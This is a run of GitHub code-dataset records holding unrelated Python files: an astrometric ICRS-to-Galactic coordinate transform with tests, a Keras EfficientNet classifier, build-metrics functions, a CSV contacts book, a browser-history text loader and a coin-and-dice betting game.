terms\n nterms = EqCoords.shape[0]\n\n # Unit conversion - rename things to IcrsXXX to avoid confusion\n CoordConverter = np.array([deg2rad,deg2rad,mas2rad,mas2rad,mas2rad])\n IcrsCoord = EqCoords * CoordConverter\n IcrsUncerts = EqUncerts*mas2rad\n\n # If no covariance matrix is provided, correlation coefficients are assumed to be 0,\n # and covariances taken for quoted uncertainties\n if EqC is None :\n C = np.zeros([nterms,5,5])\n row,col = np.diag_indices(5)\n C[:,row,col] = IcrsUncerts**2\n else :\n C = EqC*mas2rad*mas2rad\n\n alpha = IcrsCoord[:,0] #(IcrsCoord[:,0]).reshape(nterms)\n delta = IcrsCoord[:,1] #.reshape(nterms)\n\n # Construct rIcrs\n rIcrs = np.transpose(np.asarray([np.cos(alpha)*np.cos(delta),\n np.sin(alpha)*np.cos(delta),\n np.sin(delta)]))\n\n # Construct rGal\n rGal = np.einsum('ij,kj->ki',Aprime,rIcrs)\n\n l = np.arctan2(rGal[:,1], rGal[:,0])\n b = np.arctan2(rGal[:,2], np.sqrt(rGal[:,0]**2 + rGal[:,1]**2))\n\n # The transformation of the proper motion components, eq 3.64, 3.65\n pGal = np.asarray([-np.sin(l),\n np.cos(l),\n np.zeros_like(l)])\n qGal = np.asarray([-np.cos(l)*np.sin(b),\n -np.sin(l)*np.sin(b),\n np.cos(b)])\n pIcrs = np.asarray([-np.sin(alpha),\n np.cos(alpha),\n np.zeros_like(alpha)])\n qIcrs = np.asarray([-np.cos(alpha)*np.sin(delta),\n -np.sin(alpha)*np.sin(delta),\n np.cos(delta)])\n\n muAlphaStar = IcrsCoord[:,3]\n muDelta = IcrsCoord[:,4]\n # eq 3.66, 3.67\n muIcrs = pIcrs*muAlphaStar + qIcrs*muDelta\n muGal = np.einsum('ij,jk ->ik',Aprime,muIcrs)\n\n # Galactic proper motions, eq 3.70\n mulStar = np.sum(pGal*muGal,axis=0)\n mub = np.sum(qGal*muGal,axis=0)\n\n # eq 3.80\n gal = (np.hstack((pGal.T, qGal.T))).reshape(nterms,2,3)\n icrs = (np.hstack((pIcrs.T, qIcrs.T))).reshape(nterms,2,3)\n\n tmp = np.einsum('ij,klj->kil',Aprime,icrs)\n G = np.einsum('ijk,ikl->ijl', gal,tmp)\n\n # Jacobian, eq 3.77, 3.79\n Arr0 = np.zeros(nterms)\n Arr1 = np.ones(nterms)\n J = np.asarray([[G[:,0,0], 
G[:,0,1], Arr0, Arr0, Arr0],\n [G[:,1,0], G[:,1,1], Arr0, Arr0, Arr0],\n [ Arr0, Arr0, Arr1, Arr0, Arr0],\n [ Arr0, Arr0, Arr0, G[:,0,0], G[:,0,1]],\n [ Arr0, Arr0, Arr0, G[:,1,0], G[:,1,1]]])\n # rearrange terms\n J = np.einsum('ijk->kij',J)\n JT = np.einsum('ijk->ikj',J)\n\n GalC = np.matmul(np.matmul(J,C),JT)\n #print(np.einsum('ijk,ikl->ijl',J,JT))\n GalCoords = np.atleast_2d(np.asarray((l,b,IcrsCoord[:,2],mulStar,mub))).T/CoordConverter\n GalUncerts = np.atleast_2d(np.sqrt(np.diagonal(GalC,axis1=1,axis2=2)))/mas2rad\n GalC = GalC/mas2rad**2\n return GalCoords, GalUncerts, GalC\n\n\ndef CreateCovarianceMatrix_ra_dec (ra_error, dec_error, parallax_error, pmra_error, pmdec_error,\n radecCorr=0, raparallaxCorr=0, rapmraCorr=0, rapmdecCorr=0,\n decparallaxCorr=0, decpmraCorr=0, decpmdecCorr=0,\n parallaxpmraCorr=0, parallaxpmdecCorr=0,\n pmrapmdecCorr=0) :\n '''Create a covarience matrix from input uncertainties and correlations in ICRS coordinates\n\n Parameters:\n ------------\n\n ra_error, dec_error, parallax_error, pmra_error, pmdec_error :\n Each must be an array of values (all of the same length, N)\n\n XXXCorr: corellations between parameters.\n Must be either an array of length N or a value.\n If not given, assumed to be zero.\n\n Returns:\n ---------\n\n C: Covariance matrix. Format numpy array of dimensions (nterms,5,5)\n\n '''\n nterms = len(ra_error)\n\n for err in [dec_error, parallax_error, pmra_error, pmdec_error] :\n assert (len(err) == nterms), 'error terms must have the same length'\n\n FirstPart = [0,0,0,0,1,1,1,2,2,3]\n SecondPart = [1,2,3,4,2,3,4,3,4,4]\n Correlations = [radecCorr, raparallaxCorr, rapmraCorr, rapmdecCorr,\n decparallaxCorr, decpmraCorr, decpmdecCorr,\n parallaxpmraCorr, parallaxpmdecCorr,\n pmrapmdecCorr]\n\n\n C = np.zeros([nterms,5,5])\n C[:,0,0] = ra_error**2\n C[:,1,1] = dec_error**2\n C[:,2,2] = parallax_error**2\n C[:,3,3] = pmra_error**2\n C[:,4,4] = pmdec_error**2\n\n for a,b,Corr in zip(FirstPart, SecondPart, Correlations) :\n C[:,a,b] = C[:,b,a] = np.sqrt(C[:,a,a]*C[:,b,b])*Corr\n return C\n\n\ndef CreateCovarianceMatrix_l_b (l_error, b_error, varpi_error, pmlStar_error, pmb_error,\n lbCorr=0, lvarpiCorr=0, lpmlStarCorr=0, lpmbCorr=0,\n bvarpiCorr=0, bpmlStarCorr=0, bpmbCorr=0,\n varpipmlStarCorr=0, varpipmbCorr=0,\n pmlStarpmbCorr=0) :\n '''Create a covarience matrix from input uncertainties and correlations in Galactic coordinates\n\n Parameters:\n ------------\n\n l_error, b_error, varpi_error, pmlStar_error, pmb_error :\n Each must be an array of values (all of the same length, N)\n\n XXXCorr: corellations between parameters.\n Must be either an array of length N or a value.\n If not given, assumed to be zero.\n\n Returns:\n ---------\n\n C: Covariance matrix. 
Format numpy array of dimensions (nterms,5,5)\n '''\n nterms = len(l_error)\n\n for err in [ b_error, varpi_error, pmlStar_error, pmb_error] :\n assert (len(err) == nterms), 'error terms must have the same length'\n\n FirstPart = [0,0,0,0,1,1,1,2,2,3]\n SecondPart = [1,2,3,4,2,3,4,3,4,4]\n Correlations = [lbCorr, lvarpiCorr, lpmlStarCorr, lpmbCorr,\n bvarpiCorr, bpmlStarCorr, bpmbCorr,\n varpipmlStarCorr, varpipmbCorr,\n pmlStarpmbCorr]\n\n C = np.zeros([nterms,5,5])\n C[:,0,0] = l_error**2\n C[:,1,1] = b_error**2\n C[:,2,2] = varpi_error**2\n C[:,3,3] = pmlStar_error**2\n C[:,4,4] = pmb_error**2\n\n for a,b,Corr in zip(FirstPart, SecondPart, Correlations) :\n C[:,a,b] = C[:,b,a] = np.sqrt(C[:,a,a]*C[:,b,b])*Corr\n return C\n\n\ndef testConversions() :\n # test values\n ra = np.asarray([9.1185, 30.00379737])\n dec = np.asarray([+01.08901332, -19.49883745])\n parallax = np.asarray([3.54, 21.90])\n pmra = np.asarray([-5.20, 181.21])\n pmdec = np.asarray([-1.88, -0.93])\n\n l,b,pmlStar,pmb = ra,dec,pmra,pmdec\n ##\n ra_error = np.asarray([1.32, 1.28])\n dec_error = np.asarray([0.74, 0.70])\n parallax_error = np.asarray([1.39, 3.10])\n pmra_error = np.asarray([1.36, 1.74])\n pmdec_error = np.asarray([0.81, 0.92])\n\n l_error,b_error,pmlStar_error,pmb_error = ra_error,dec_error,pmra_error,pmdec_error\n #\n icrsCoords = np.vstack((ra,dec,parallax,pmra,pmdec)).T\n icrsErrors = np.vstack((ra_error,dec_error,parallax_error,pmra_error,pmdec_error)).T\n\n # Obviously these are also valid coords, though not the same\n GalCoords = np.vstack((l,b,parallax,pmlStar,pmb)).T\n GalErrors = np.vstack((l_error,b_error,parallax_error,pmlStar_error,pmb_error)).T\n\n icrsCov = CreateCovarianceMatrix_ra_dec(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n tol = 1e-10\n # Test 1 - Icrs to Gal: conversion w.o. covarience matrix\n GC = transformIcrsToGal(icrsCoords,icrsErrors)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 1 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 1 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 1 - Cov')\n else : print('Passed test 1')\n\n # Test 2 - Icrs to Gal: conversion w. covarience matrix\n GC = transformIcrsToGal(icrsCoords,icrsErrors,icrsCov)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 2 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 2 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 2 - Cov')\n else : print('Passed test 2')\n\n # Test 3 - Icrs to Gal: conversion w.o. uncertainties (cov only)\n GC = transformIcrsToGal(icrsCoords,0,icrsCov)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 3 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 3 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 3 - Cov')\n else : print('Passed test 3')\n\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n\n # Test 4 - Gal to Icrs: conversion w.o. 
covarience matrix\n Icrs = transformGalToIcrs(GalCoords,GalErrors)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 4 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 4 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 4 - Cov')\n else : print('Passed test 4')\n\n # Test 5 - Gal to Icrs: conversion w. covarience matrix\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n Icrs = transformGalToIcrs(GalCoords,GalErrors,GalCov)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 5 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 5 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 5 - Cov')\n else : print('Passed test 5')\n\n # Test 6 - Gal to Icrs: conversion w. covarience matrix\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error)\n Icrs = transformGalToIcrs(GalCoords,GalErrors)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 6 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 6 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 6 - Cov')\n else : print('Passed test 6')\n\n # Test 7 & 8: test with non-zero covariances\n GalCov = CreateCovarianceMatrix_l_b(ra_error,dec_error,parallax_error,pmra_error,pmdec_error,\n lbCorr=0.7,pmlStarpmbCorr=np.array([-0.2,0.6]))\n\n Icrs = transformGalToIcrs(GalCoords,GalErrors,GalCov)\n GC = transformIcrsToGal(Icrs[0],Icrs[1],Icrs[2])\n if(np.max(GC[0]-GalCoords)>tol) : print('Error in test 7 - Coords')\n elif(np.max(GC[1]-GalErrors)>tol) : print('Error in test 7 - Errors')\n elif(np.max(GC[2]-GalCov)>tol) : print('Error in test 7 - Cov')\n else : print('Passed test 7')\n\n icrsCov = CreateCovarianceMatrix_ra_dec(ra_error,dec_error,parallax_error,pmra_error,pmdec_error,\n decparallaxCorr=np.array([0.3,0.7]), pmrapmdecCorr=-0.4)\n\n GC = transformIcrsToGal(icrsCoords,icrsErrors,icrsCov)\n Icrs = transformGalToIcrs(GC[0],GC[1],GC[2])\n if(np.max(Icrs[0]-icrsCoords)>tol) : print('Error in test 8 - Coords')\n elif(np.max(Icrs[1]-icrsErrors)>tol) : print('Error in test 8 - Errors')\n elif(np.max(Icrs[2]-icrsCov)>tol) : print('Error in test 8 - Cov')\n else : print('Passed test 8')\n\n#testConversions()\n","repo_name":"Johngn/gaia","sub_path":"coordTransform.py","file_name":"coordTransform.py","file_ext":"py","file_size_in_byte":19742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25151447404","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow.keras.layers as layers\ndef get_my_EFFmodel(img_height, img_width, class_nums, checkpoint = None):\n # load the EFF_model\n\n EFF_model = tf.keras.applications.EfficientNetB4(\n include_top=False, weights='imagenet', input_tensor=None,\n input_shape=(img_height, img_width, 3), pooling=None,\n classifier_activation=None,\n )\n\n data_augmentation = keras.Sequential(\n [\n layers.experimental.preprocessing.RandomFlip(\"horizontal\", input_shape=(img_height, img_width, 3)),\n layers.experimental.preprocessing.RandomRotation(0.3),\n layers.experimental.preprocessing.RandomZoom(0.1)\n ]\n )\n\n # classifier\n classifier = keras.Sequential([\n layers.Dropout(0.2),\n layers.Dense(class_nums, activation='softmax')]\n )\n\n # normalization\n norm_layer = 
keras.layers.experimental.preprocessing.Rescaling(1. / 255, input_shape=(img_height, img_width, 3))\n\n # create my own model and compile\n inputs = keras.Input(shape=(img_width, img_height, 3))\n\n x = data_augmentation(inputs)\n x = norm_layer(x)\n x = EFF_model(x, training=True)\n x = keras.layers.GlobalAveragePooling2D()(x)\n\n outputs = classifier(x)\n model = keras.Model(inputs, outputs)\n if checkpoint is not None:\n model.load_weights(checkpoint)\n model.trainable = True\n\n return model\n","repo_name":"Mars-Wei/JNPL","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43313735683","text":"\"\"\"\nFunctions for calculating metrics based on the build data.\n\"\"\"\nimport pandas\n\nimport numpy as np\n\nfrom typing import Any, Dict, List, Set, Tuple\nfrom datetime import datetime, timedelta\n\n\ndef summarise(summary: Dict[str, Any]) -> str:\n \"\"\"\n Return a human-readable text summary of the provided values.\n \"\"\"\n out = [\"Summary\"]\n out += [\"=======\\n\"]\n out += [f\"Period: {summary['start']} - {summary['end']}\\n\"]\n\n out += [f\"- Total builds: {summary['n builds']}\"]\n out += [f\"- Number of users: {summary['n users']}\"]\n\n out += [f\"- Builds with packages: {summary['n builds with packages']}\"]\n\n out += [f\"- Builds with filesystem customizations: {summary['n builds with fs customizations']}\"]\n\n out += [f\"- Builds with custom repos: {summary['n builds with custom repos']}\"]\n return \"\\n\".join(out)\n\n\ndef summarize(summary: Dict[str, Any]) -> str:\n \"\"\"\n Alias for summarise().\n \"\"\"\n return summarise(summary)\n\n\ndef make_summary(builds: pandas.DataFrame) -> Dict[str, Any]:\n \"\"\"\n Return a dictionary that summarises the data in builds.\n The dictionary can be consumed by summarise() to create a human-readable text summary of the data.\n \"\"\"\n summary = {\n \"start\": builds[\"created_at\"].min(),\n \"end\": builds[\"created_at\"].max(),\n \"n builds\": builds.shape[0],\n \"n users\": builds[\"org_id\"].nunique(),\n \"n builds with packages\": builds[\"packages\"].apply(bool).sum(),\n \"n builds with fs customizations\": builds[\"filesystem\"].apply(bool).sum(),\n \"n builds with custom repos\": builds[\"payload_repositories\"].apply(bool).sum(),\n }\n\n return summary\n\n\ndef monthly_value(builds: pandas.DataFrame, column: str) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of unique values for the given column that appear in the data for each calendar month within the\n date ranges found in the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n month_offset = pandas.DateOffset(months=1)\n\n t_start = builds[\"created_at\"].min()\n m_start = pandas.Timestamp(year=t_start.year, month=t_start.month, day=1) # start of month of first data point\n\n t_end = builds[\"created_at\"].max()\n # start of month following last data point\n m_end = pandas.Timestamp(year=t_end.year, month=t_end.month, day=1) + pandas.DateOffset(months=1)\n\n month_starts = []\n n_values = []\n m_current = m_start\n while m_current < m_end:\n idxs = (builds[\"created_at\"] >= m_current) & (builds[\"created_at\"] < m_current+month_offset)\n n_values.append(builds[column].loc[idxs].nunique())\n month_starts.append(m_current)\n m_current += month_offset\n\n return np.array(n_values), np.array(month_starts)\n\n\ndef 
monthly_users(builds: pandas.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of unique users that appear in the data for each calendar month within the date ranges found in\n the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n return monthly_value(builds, \"org_id\")\n\n\ndef monthly_builds(builds: pandas.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of builds in the data for each calendar month within the date ranges found in the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n return monthly_value(builds, \"job_id\")\n\n\ndef monthly_new_users(builds: pandas.DataFrame) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of new users that appear each calendar month within the date ranges found in the build data.\n The second return value is an array of the start dates of each month corresponding to the counts in the first value.\n \"\"\"\n # get the first build date for each org_id, then calculate monthly_users from that data only\n first_builds: List[Dict[str, Any]] = []\n for org_id in builds[\"org_id\"].unique():\n org_builds = builds.loc[builds[\"org_id\"] == org_id]\n first_date = org_builds[\"created_at\"].min()\n first_builds.append({\"org_id\": org_id, \"created_at\": first_date})\n\n df = pandas.DataFrame.from_dict(first_builds)\n return monthly_users(df)\n\n\ndef value_sliding_window(builds: pandas.DataFrame, column: str, window: int) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Returns the number of unique values for the given column that appear in the data within a sliding window of a given\n width (in days).\n The second return value is an array of the end dates for each window corresponding to each element in the first\n value.\n \"\"\"\n window = pandas.Timedelta(days=window)\n t_start = builds[\"created_at\"].min()\n t_end = builds[\"created_at\"].max()\n step = pandas.Timedelta(days=1) # slide the window 1 day each time\n\n end_dates = []\n n_values = []\n t_current = t_start + window # start with a full window\n while t_current < t_end:\n idxs = (builds[\"created_at\"] >= t_current-window) & (builds[\"created_at\"] < t_current)\n n_values.append(builds[column].loc[idxs].nunique())\n end_dates.append(t_current)\n t_current += step\n\n return np.array(n_values), np.array(end_dates)\n\n\ndef builds_over_time(builds: pandas.DataFrame, period: timedelta) -> Tuple[np.ndarray, np.ndarray]:\n t_start = builds[\"created_at\"].min()\n t_end = builds[\"created_at\"].max()\n bin_starts = []\n n_builds = []\n while t_start+period < t_end:\n idxs = (builds[\"created_at\"] >= t_start) & (builds[\"created_at\"] < t_start+period)\n n_builds.append(sum(idxs))\n bin_starts.append(t_start)\n t_start += period\n\n return np.array(bin_starts), np.array(n_builds)\n\n\ndef repeat_orgs(builds: pandas.DataFrame, min_builds: int, period: timedelta) -> Set[str]:\n \"\"\"\n Return a list of org_ids that have built at least 'min_builds' in a period of 'period'.\n \"\"\"\n orgs = builds[\"org_id\"].unique()\n\n active_orgs = set()\n\n pd_period = pandas.Timedelta(period) # convert for compatibility with numpy types\n\n for org in orgs:\n org_build_idxs = builds[\"org_id\"] == org\n org_build_dates = builds[\"created_at\"].loc[org_build_idxs]\n periods = np.diff(org_build_dates.sort_values())\n\n # if a sum of min_builds-1 periods is less than period, 
then the org is identified as a repeat/active org\n        for p_idx, _ in enumerate(periods):\n            p_sum = np.sum(periods[p_idx:p_idx+min_builds-1])\n\n            if p_sum < pd_period:\n                active_orgs.add(org)\n\n    return active_orgs\n\n\ndef org_build_days(builds: pandas.DataFrame) -> pandas.DataFrame:\n    \"\"\"\n    Org IDs associated with the dates where they had at least one build.\n    \"\"\"\n    build_days: List[Dict[str, Any]] = []\n    for org_id in builds[\"org_id\"].unique():\n        org_builds = builds.loc[builds[\"org_id\"] == org_id]\n        dates = np.unique(org_builds[\"created_at\"].values.astype(\"datetime64[D]\")) # round to day\n        build_days.append({\"org_id\": org_id, \"build_dates\": dates})\n\n    return pandas.DataFrame.from_dict(build_days)\n\n\ndef active_orgs(builds: pandas.DataFrame, min_days: int, recent_limit: int) -> pandas.Series:\n    \"\"\"\n    Returns a Series of org_ids for orgs that have builds on at least min_days separate days and whose most recent\n    build falls within the last recent_limit days.\n    \"\"\"\n    build_days = org_build_days(builds)\n    counts = build_days[\"build_dates\"].apply(len)\n    build_days = build_days.loc[counts >= min_days]\n    cutoff = datetime.now() - timedelta(days=recent_limit)\n    most_recent_dates = build_days[\"build_dates\"].apply(max)\n    recent_idxs = most_recent_dates > cutoff\n    recent_orgs = build_days[\"org_id\"].loc[recent_idxs]\n    return recent_orgs\n","repo_name":"larskarlitski/metrics","sub_path":"ibmetrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"11863549493","text":"import csv\n\nclass Contact:\n    first_name = \"\"\n    last_name = \"\"\n    company_name = \"\"\n    address = \"\"\n    city = \"\"\n    county = \"\"\n    state = \"\"\n    zip = \"\"\n    cell_phone = \"\"\n    home_phone = \"\"\n    email = \"\"\n\n\nclass ContactsBook:\n    def __init__(self, file_name):\n        # keep the contact list on the instance so separate books do not share state\n        self.__contacts = []\n        self.__read_contacts_from_file(file_name)\n\n\n    def show_contacts(self):\n        for c in self.__contacts:\n            print(c.first_name + \" - \" + c.last_name + \" - \" + c.address + \" - \" + c.cell_phone)\n\n    def add_contact(self, contact):\n        self.__contacts.append(contact)\n\n    def remove_contact(self, contact):\n        self.__contacts.remove(contact)\n\n    def find_contact_by_name(self, first_name, last_name):\n        for c in self.__contacts:\n            if first_name != \"\" and last_name != \"\" and c.first_name == first_name and c.last_name == last_name:\n                return c\n            elif first_name != \"\" and c.first_name == first_name:\n                return c\n            elif last_name != \"\" and c.last_name == last_name:\n                return c\n\n    def find_contact_by_phone(self, cell_phone):\n        for c in self.__contacts:\n            if cell_phone != \"\" and c.cell_phone == cell_phone:\n                return c\n\n    def __read_contacts_from_file(self, file_name):\n        with open(file_name, \"r\", newline=\"\") as file:\n            reader = csv.reader(file)\n\n            # skip the header row\n            next(reader)\n\n            for row in reader:\n                c = Contact()\n                c.first_name = row[0]\n                c.last_name = row[1]\n                c.company_name = row[2]\n                c.address = row[3]\n                c.city = row[4]\n                c.county = row[5]\n                c.state = row[6]\n                c.zip = row[7]\n                c.cell_phone = row[8]\n                c.home_phone = row[9]\n                c.email = row[10]\n                self.add_contact(c)\n\n    def write_contacts_from_console(self, file_name):\n        with open(file_name, \"a\", newline=\"\") as file:\n            writer = csv.writer(file)\n            # csv.writer has no writeheader() and cannot serialise Contact objects,\n            # so write each contact out as a plain list of field values\n            for c in self.__contacts:\n                writer.writerow([c.first_name, c.last_name, c.company_name, c.address, c.city,\n                                 c.county, c.state, c.zip, c.cell_phone, c.home_phone, c.email])\n\n\n\n\ndef add_contact_from_console(number):\n    for n in range(number):\n        person = Contact()\n        print(\"Contact # %d\" % (n + 1))\n\n        person.first_name = input(\"First name - \")\n        person.last_name = input(\"Second name - \")\n        person.company_name = input(\"Company name - \")\n        person.address = input(\"Address - \")\n        person.city = input(\"City - \")\n        person.county = input(\"County - \")\n        person.state = input(\"State - \")\n        person.zip = input(\"Zip - \")\n        person.cell_phone = input(\"Cell phone - \")\n        person.home_phone = input(\"Home phone - \")\n        person.email = input(\"Email - \")\n\n        # actually store the contact that was just typed in\n        contactsBook.add_contact(person)\n\n\ncontactsBook = ContactsBook(\"contacts.csv\")\n\nadd_contact_from_console(1)\ncontactsBook.show_contacts()\ncontactsBook.write_contacts_from_console(file_name=\"contacts.csv\")","repo_name":"DrowLegend/Tasks-from-course","sub_path":"PhoneBook.py","file_name":"PhoneBook.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"20957565421","text":"import os\nimport re\nfrom datetime import datetime\nfrom typing import List, Union\nfrom urllib.parse import urlparse\n\nimport pandas as pd\nimport requests\nimport requests_cache\nfrom bs4 import BeautifulSoup\nfrom dateutil.parser import parse\nfrom pandas import DataFrame\n\nfrom no_preference.lib.util import get_logger\n\n\nSUPPORTED_PROTOCOLS = r'^https?://'\nWEB_CONTENT_EXTENSIONS_PATTERN = r'(\\.(aspx?|x?html?|php(3|4)|jspx?))?'\nIRRELEVANT_URL_PATTERNS = [\n    # Search engines homepages and queries\n    r'^https?:\\/\\/(www\\.)?google\\.com\\/?\\??.*$',\n    r'^https?:\\/\\/(www\\.)?google\\.com\\/search.*$',\n    r'^https?:\\/\\/(www\\.)?bing\\.com\\/?\\??.*$',\n    r'^https?:\\/\\/(www\\.)?bing\\.com\\/search.*$',\n    # Supported social media (analysed separately)\n    r'^https?:\\/\\/(www\\.)?twitter\\.com.*$',\n    r'^https?:\\/\\/(www\\.)?facebook\\.com.*$',\n]\n\nLOGGER = get_logger(__name__)\n\nrequests_cache.install_cache()\n\n\ndef _get_url_extension(url: str) -> str:\n    path = urlparse(url).path\n    return os.path.splitext(path)[1]\n\n\ndef _is_relevant_url(url: str) -> bool:\n    # Filter out non-http(s) URLs\n    if not re.match(SUPPORTED_PROTOCOLS, url):\n        return False\n\n    for pattern in IRRELEVANT_URL_PATTERNS:\n        if re.match(pattern, url):\n            return False\n\n    url_ext = _get_url_extension(url)\n    return bool(re.match(WEB_CONTENT_EXTENSIONS_PATTERN, url_ext))\n\n\ndef _filter_urls(urls: List[str]) -> List[str]:\n    \"\"\"\n    Removes duplicate entries, irrelevant URLs (like search engine queries), ...\n    :param urls:\n    :return:\n    \"\"\"\n    # Remove duplicates\n    urls = set(urls)\n\n    # Filter irrelevant URLs\n    return list(filter(_is_relevant_url, urls))\n\n\ndef _get_url_text(url: str) -> Union[str, None]:\n    # Read URL and create DOM object\n    try:\n        response = requests.get(url)\n    except requests.exceptions.ConnectionError:\n        LOGGER.warning(f'Could not load URL \"{url}\".')\n        return\n    html = response.text\n    dom = BeautifulSoup(html, 'html.parser')\n\n    # Remove all code tags\n    for code in dom(['script', 'style']):\n        code.extract()\n\n    text: str = dom.get_text(separator=' ')\n\n    # Remove empty lines, trim each line and reassemble the string\n    filtered_text = '\\n'.join(\n        map(lambda line: line.strip(),\n            filter(lambda line: not re.match(r'^\\s*$', line), text.splitlines())))\n\n    return filtered_text\n\n\ndef _load_history_text(urls: List[str]) -> List[str]:\n    relevant_urls = _filter_urls(urls)\n    relevant_urls_len = len(relevant_urls)\n    LOGGER.info('Loading {} relevant URLs out of {} history entries.'.format(relevant_urls_len, len(urls)))\n    
history_text = []\n    for i, url in enumerate(relevant_urls):\n        LOGGER.info(f'{i + 1}/{relevant_urls_len}: Loading \"{url}\".')\n        url_text = _get_url_text(url)\n        if url_text:\n            history_text.append(url_text)\n    return history_text\n\n\ndef load_history(history: DataFrame, from_time: datetime = None, to_time: datetime = None) -> DataFrame:\n    # Filter by visit time\n    if from_time or to_time:\n        history['date'] = pd.to_datetime(history['date'], format='%Y-%m-%d %H:%M:%S')\n\n        if not from_time:\n            from_time = datetime.fromtimestamp(0)\n        if not to_time:\n            to_time = datetime.now()\n\n        history = history[(from_time <= history['date']) & (history['date'] <= to_time)]\n\n    return DataFrame(zip(history['date'], _load_history_text(history['url'])),\n                     columns=['date', 'content'])\n\n\nif __name__ == '__main__':\n    csv = pd.read_csv('../../datasets/chrome_history_nathan.csv', parse_dates=['last_visit_time'], date_parser=parse)\n    results = load_history(csv, from_time=datetime(2019, 10, 23), to_time=datetime(2019, 10, 23, 23, 59, 59))\n    print(results)\n","repo_name":"nathanlepori/sit-no-preference","sub_path":"no_preference/processing/browser_history.py","file_name":"browser_history.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"13236789287","text":"import random\r\n\r\nmoney = 100\r\n\r\n#Write your game of chance functions here\r\ndef coin():\r\n    coin = random.randint(1,2)\r\n    if coin == 1:\r\n        return \"Heads\"\r\n    else:\r\n        return \"Tails\"\r\n\r\ndef coin_flips(guess,bet):\r\n    toss = coin()\r\n    #the original check was always truthy for any guess except \"Heads\", and an invalid guess made the function return None\r\n    if guess not in (\"Heads\", \"Tails\"):\r\n        print(\"Your input is wrong\")\r\n        return 0\r\n    print(toss)\r\n    if toss == guess:\r\n        return bet\r\n    else:\r\n        return -bet\r\n\r\ndef guess_cho_han():\r\n    dice_one = random.randint(1,6)\r\n    dice_two = random.randint(1,6)\r\n    result_dice = dice_one + dice_two\r\n    if result_dice%2 == 0:\r\n        return \"even\"\r\n    else:\r\n        return \"odd\"\r\n\r\ndef cho_han(guess,bet):\r\n    result = guess_cho_han()\r\n    if guess not in (\"odd\", \"even\"):\r\n        print(\"Your input is wrong\")\r\n        return 0\r\n    print(result)\r\n    if result == guess:\r\n        return bet\r\n    else:\r\n        return -bet\r\n\r\ndef card():\r\n    player1 = random.randint(1,10)\r\n    player2 = random.randint(1,10)\r\n    if player1 > player2:\r\n        return \"player1\"\r\n    elif player2 > player1:\r\n        return \"player2\"\r\n    else:\r\n        #a draw used to return a tuple, which no caller could match\r\n        return \"tie\"\r\n\r\ndef player_wins(guess,bet):\r\n    pick_player = card()\r\n    if guess not in (\"player1\", \"player2\"):\r\n        print(\"Your input is wrong\")\r\n        return 0\r\n    print(pick_player)\r\n    if pick_player == \"tie\":\r\n        return 0\r\n    elif pick_player == guess:\r\n        return bet\r\n    else:\r\n        return -bet\r\n\r\n#Call your game of chance functions here\r\nmoney += coin_flips(\"Heads\", 60)\r\nmoney += cho_han(\"odd\", 70)\r\nmoney += player_wins(\"player1\",80)\r\nif money < 0 :\r\n    print(\"You have 0 balance now!\")\r\nelse : \r\n    print(\"You have \"+ str(money) +\" balance 